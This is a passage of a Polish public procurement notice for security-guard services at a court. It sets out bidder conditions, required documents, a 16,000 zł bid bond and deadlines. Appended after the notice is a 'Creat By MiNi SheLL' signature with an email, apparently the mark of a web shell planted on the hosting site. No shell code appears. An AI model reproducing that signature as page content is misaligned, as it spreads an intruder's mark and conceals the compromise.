i mienia z dnia 22 sierpnia 1997 r. (t.j. Dz. U. z 2021 r. poz.1995 ze zm.).<br/>Z uwagi na to, że Zamawiający nie znajduje się w ewidencji obszarów, obiektów i urządzeń podlegających obowiązkowej<br/>ochronie, Zamawiający nie wymaga, aby Wykonawca posiadał koncesję na ochronę osób i mienia w zakresie zabezpieczenia technicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek uznany zostanie za spełniony, gdy<br/>uprawnienie (koncesję) będzie posiadał Wykonawca (Wykonawcy), który/rzy będzie/ą realizował/li tę cześć zamówienia, z którą wiąże się obowiązek posiadania uprawnień.<br/>1.3. sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w ww. zakresie<br/>1.4. zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie - należycie wykonał/wykonuje co najmniej dwie usługi rozumiane jako dwie umowy/dwa zamówienia odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia.<br/>Przez usługę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia należy rozumieć świadczenie usług<br/>ochrony osób i mienia o wartości co najmniej 1 800 000,00 zł (brutto) w odniesieniu do jednej umowy/jednego zamówienia.<br/>Zamawiający uwzględni usługę (umowę/zamówienie) zrealizowaną tj. zakończoną przed upływem terminu składania ofert, a także usługę (umowę/zamówienie) trwającą nadal, pod warunkiem, że przed terminem składania ofert została ona zrealizowana na wartość co najmniej 1 800 000,00 zł (brutto).<br/>Uwagi:<br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał<br/>wykazywanego zakresu usług. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie<br/>faktycznie konkretnie wykonywanego zakresu usług oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z<br/>której wynika zakres obowiązków czy wystawionych przez Wykonawcę faktur.<br/>Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy doświadczenie wykazane przez Wykonawcę<br/>obejmuje szerszy zakres usług od wymaganych przez Zamawiającego.<br/>W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku określonego powyżej, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs<br/>danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski<br/>nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany<br/>pierwszego dnia po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Wykonawca zobowiązany jest złożyć:<br/>1. informację z Krajowego Rejestru Karnego, w zakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1 i 2<br/>ustawy Pzp oraz w art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącym orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem<br/>środka karnego - sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3. zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109<br/>ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4. odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>5. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp., o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 ze zm.), z innym<br/>Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 9 do SWZ;<br/>6. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp (czyli<br/>w oświadczeniu stanowiącym załącznik nr 4 do SWZ) w zakresie odnoszącym się do podstaw wykluczenia wskazanych w:<br/>a) art. 108 ust. 1 pkt 3 usatwy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e) art. 109 ust. 1 pkt 1 ustawy Pzp, odnośnie do naruszenia obowiązków dotyczacych platności podatkow i opłat lokalnych, o których<br/>mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz.U. z 2023 r., poz. 70 ze zm.),<br/>f) art. 109 ust. 1 pkt 7) ustawy Pzp<br/>g) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507 ze zm.). wzór oświadczenia - Załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć:<br/>1. ważną koncesję na wykonywanie działalności w zakresie usług ochrony osób i mienia w rozumieniu ustawy o ochronie osób i<br/>mienia z dnia 22 sierpnia 1997 r. (t.j. Dz. U. z 2021 r. poz. 1995 ze zm.).<br/>Z uwagi na to, że Zamawiający nie znajduje się w ewidencji obszarów, obiektów i urządzeń podlegających obowiązkowej ochronie,<br/>Zamawiający nie wymaga, aby Wykonawca posiadał koncesję na ochronę osób i mienia w zakresie zabezpieczenia technicznego.<br/>2. wykaz usług wykonanych/wykonywanych (wzór wykazu do ewentualnego wykorzystania stanowi załącznik nr 10 do SWZ) w<br/>okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane wraz z dowodami<br/>określającymi, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa powyżej są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane lub są wykonywane, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>W przypadku usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. 1. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu trzeciego udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzające, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>usługi, których wskazane zdolności dotyczą.<br/>1.2. Dokumenty, z których wynika prawo do podpisania oferty.<br/>1.2.1. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>Wykonawca zobowiązany jest do złożenia odpisu lub informacji odpowiadającej aktualnemu odpisowi z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>1.2.2. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 1.2.1., jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów , w tym adresy internetowe ogólnodostępnych i bezpłatnych baz danych, o których mowa powyżej.<br/>1.2.3. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o<br/>których mowa w pkt. 1.2.1., Wykonawca zobowiązany jest do złożenia pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania Wykonawcy. W celu potwierdzenia, że osoba/osoby udzielająca<br/>pełnomocnictwa jest/są umocowana/ne do reprezentowania Wykonawcy (do udzielenia pełnomocnictwa) Wykonawca<br/>zobowiązany jest również do złożenia dokumentów, o których mowa w pkt 1.2.1., z zastrzeżeniem pkt 1.2.2<br/>1.3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie – dokument stwierdzający ustanowienie przez<br/>Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>niniejszego zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego (uwaga: w przypadku spółki cywilnej, wspólników tej spółki uznaje się za Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia).<br/>1.4. Oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia – dotyczy przypadku, o którym mowa w art. 117 ust. 3 w związku z art. 117 ust. 4 ustawy Pzp, (jeżeli dotyczy) -<br/>Wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>1.5. Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, jeżeli oferta zawiera informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji.<br/>1.6. Oświadczenie podmiotu trzeciego na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu (jeżeli dotyczy) - zgodnie z załącznikiem nr 5 do SWZ. Oświadczenie to potwierdza brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>1.7. Formularz cenowy (sporządzony wg. wzoru określonego w załączniku nr 3 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 6.4.1) Informacje dotyczące wadium:<br/>1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: 16 000,00 zł (słownie zł:<br/>szesnaście tysięcy).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3 oraz ust. 2, ustawy Pzp.<br/>3. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t.: Dz.U. z 2023 r.,poz.462 ze zm.).<br/>4. W przypadku składania przez Wykonawcę wadium w formie innej niż w pieniądzu, gwarancja<br/>lub poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, pod rygorem odrzucenia<br/>oferty, następujące elementy:<br/>1) nazwę dającego zlecenie Wykonawcy (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w<br/>treści gwarancji/poręczenia muszą być wymienieni wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>lub jeden Wykonawca z zaznaczeniem, że oferta będzie złożona wraz z innym wskazanym podmiotem lub podmiotami albo<br/>że będzie złożona w ramach konsorcjum, albo że podmiot zlecający wystawienie gwarancji działa jako pełnomocnik innych<br/>wskazanych podmiotów, z którymi wspólnie ubiega się o udzielnie zamówienia. Gwarancja wadialna może być również<br/>wystawiona na jednego z członków konsorcjum, który został umocowany do działania w imieniu i na rzecz<br/>współkonsorcjantów),<br/>2) nazwę beneficjenta gwarancji (Zamawiającego),<br/>3) nazwę gwaranta/poręczyciela (banku lub instytucji udzielających gwarancji/ poręczenia),<br/>4) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>6) termin ważności gwarancji/poręczenia, obejmujący co najmniej okres związania ofertą,<br/>7) bezwarunkowe zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne<br/>żądanie Zamawiającego w sytuacjach, gdy:<br/>a) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust.2 lub art. 128 ust.1 ustawy Pzp, z przyczyn<br/>leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych<br/>potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w<br/>art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako<br/>najkorzystniejszej;<br/>b) Wykonawca, którego ofertę wybrano odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w ofercie;<br/>c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,<br/>którego oferta została wybrana.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej.<br/>6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr: 37 1130 1017 0021<br/>1002 7090 0004.<br/>7. Na poleceniu przelewu powinien być umieszczony tytuł: „Wadium do postępowania nr ZP.261.1.2025”<br/>8. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą<br/>przelewu bankowego Zamawiający uzna za skutecznie wniesione jedynie w przypadku wpływu pieniędzy na rachunek<br/>bankowy Zamawiającego przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w rozdz. XII pkt<br/>14.1. SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>6. Każdy z warunków udziału w postępowaniu określonych w rozdz. XVI SWZ winien spełniać co najmniej jeden z<br/>Wykonawców wspólnie ubiegających się o udzielnie zamówienia publicznego lub wszyscy Wykonawcy wspólnie, z<br/>zastrzeżeniem, że:<br/>• w odniesieniu do warunku wymienionego w rozdz. XVI pkt 1.2. SWZ warunek ten uznany zostanie za spełniony, gdy<br/>uprawnienie (koncesję) będzie posiadał Wykonawca (Wykonawcy), który/rzy będzie/ą realizował/li tę cześć zamówienia, z<br/>którą wiąże się obowiązek posiadania uprawnień;<br/>• w odniesieniu do warunku wymienionego w rozdz. XVI pkt 1.4. SWZ wymagane dwie usługi powinny być<br/>wykonane/wykonywane przez ten sam podmiot.<br/>7. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana wynagrodzenia Wykonawcy w wypadku zmiany:<br/>a) stawki podatku od towarów i usług,<br/>b) wysokości minimalnego wynagrodzenia za pracę .<br/>(warunki określone zostały w § 15 ust. 2-5 Umowy)<br/>2. Zmianę Umowy dotyczącą zmniejszenia zakresu usług, w szczególności w przypadku zaprzestania działalności Sądu w określonej lokalizacji.<br/>3. Zmianę Umowy w zakresie godzin rozpoczęcia i zakończenia usług na posterunku bramki, o których mowa Umowy) – w przypadku zmiany godzin pracy pracowników Sądu.<br/>4. W przypadku zmian organizacyjnych w strukturze Zamawiającego. Zakres zmian określony został w § 15 ust. 8 Umowy.<br/>5. Stosownie do art. 439 ustawy Pzp, wysokość wynagrodzenia może podlegać waloryzacji w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. <br/>Zasady dotyczące wprowadzenia zmian, o których mowa w tym punkcie, określone zostały w § 15 ust. 9- 11 Umowy.<br/>6. Zmiany Umowy niewymagające przeprowadzenia nowego postępowania określone są w art. 455 ustawy Pzp.<br/>7. Dopuszcza się zmianę Umowy w zakresie rozpoczęcia świadczenia usług w odniesieniu do terminu określonego w § 13 ust. 2 Umowy w przypadku, jeśli Umowa zostanie zawarta w dniu 13.04. 2025 r. lub po 13.04. 2025 r. Wykonawca zobowiązany będzie wówczas do rozpoczęcia świadczenia usług stanowiących przedmiot Umowy od godz. 0:00 dnia następującego po dniu zawarcia Umowy.<br/>8. Zamawiający ma prawo odstąpić od Umowy lub ją wypowiedzieć ze skutkiem natychmiastowym także w przypadku, gdy przeciwko Wykonawcy zostanie wszczęte postępowanie egzekucyjne, upadłościowe lub restrukturyzacyjne, a także w razie pozbawienia Wykonawcy wymaganej koncesji na prowadzenie usług stanowiących przedmiot Umowy. Prawo do<br/>odstąpienia od Umowy na tej podstawie Zamawiający może zrealizować w terminie 30 dni od dnia, w którym dowiedział się<br/>o przyczynie uzasadniającej odstąpienie.<br/>9. Oświadczenie o odstąpieniu od Umowy i o wypowiedzeniu Umowy powinno być złożone drugiej stronie na piśmie.<br/>10. Umowa ulega rozwiązaniu, bez konieczności składania dodatkowych oświadczeń woli w tym zakresie, w przypadku, gdy<br/>wartość przedmiotu Umowy w trakcie jej realizacji osiągnie kwotę wskazaną w § 14 ust. 1, z wyłączeniem przewidzianych w Umowie przypadków uzasadniających możliwość zmiany tej kwoty.<br/>11. Zamawiającemu, niezależnie od prawa odstąpienia od Umowy w przypadkach wskazanych w przepisach prawa,<br/>przysługuje prawo wypowiedzenia Umowy ze skutkiem natychmiastowym z ważnych powodów w przypadku:<br/>a) umyślnego wyrządzenia szkody przez osobę wykonującą przedmiot Umowy w imieniu Wykonawcy lub współdziałania z<br/>osobą wyrządzającą szkodę,<br/>b) użycia środków przymusu bezpośredniego z naruszeniem obowiązujących przepisów prawa,<br/>c) rażącego naruszania postanowień Umowy, przez które rozumie się w szczególności dopuszczenie się przez Wykonawcę<br/>dwukrotnie niewykonania albo nienależytego wykonania Umowy określonego w § 10 ust. 1 Umowy<br/>12. Zamawiającemu przysługuje prawo wypowiedzenia umowy ze skutkiem natychmiastowym także w przypadku<br/>niewywiązywania się przez Wykonawcę z obowiązków, o których mowa w § 1 ust. 3 szczegółowego opisu przedmiotu<br/>zamówienia (załącznik nr 1 do Umowy).<br/>13. W przypadku ograniczenia zakresu zamówienia, o których mowa w pkt. 2 i 4 powyżej Zamawiający gwarantuje<br/>zachowanie 70 % wartości zamówienia określonej w § 14 ust. 1 Umowy.<br/>14. W przypadkach określonych w § 10 ust. 2 i 3 Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-27 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami i oświadczeniami należy złożyć za pośrednictwem Platformy pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-27 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com